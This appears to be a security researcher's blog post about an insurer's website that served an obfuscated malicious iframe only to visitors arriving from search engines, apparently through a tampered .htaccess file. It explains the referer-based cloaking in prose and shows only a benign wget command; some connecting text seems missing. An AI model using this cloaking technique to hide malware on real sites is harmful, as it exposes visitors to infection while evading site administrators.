At the beginning of the month I spotted a specialist US insurer’s website infected with Mal/Iframe-Gen.
However, when I investigated more deeply I did see the malicious code. The difference in the two scans was that my second scan had a referer (section 14.36 Referer) set.
When I downloaded the site again with:
wget --referer="search engine" infected.site
The eagle-eyed amongst you will recognise the script is obfuscated with the (in)famous Dean Edward’s packer. When this script is de-obfuscated you are presented with an iFrame pointing to a domain with the TLD “co.cc” with small attributes.
Ever since the “co.cc” domains have been available for registration, the researchers at SophosLabs have seen them being abused heavily by malware and used in spam campaigns.
So why is this site serving malware when you get to it via a search site?
To modify the .htaccess file the attacker is likely to have had more access than a simple SQL injection – previous cases we have investigated have been tracked down to compromised FTP passwords.
The malicious attacker uses this technique because it makes finding the offending code more difficult for the website’s administrators and security professionals.
After all, they know the website URL and don’t need to search for it.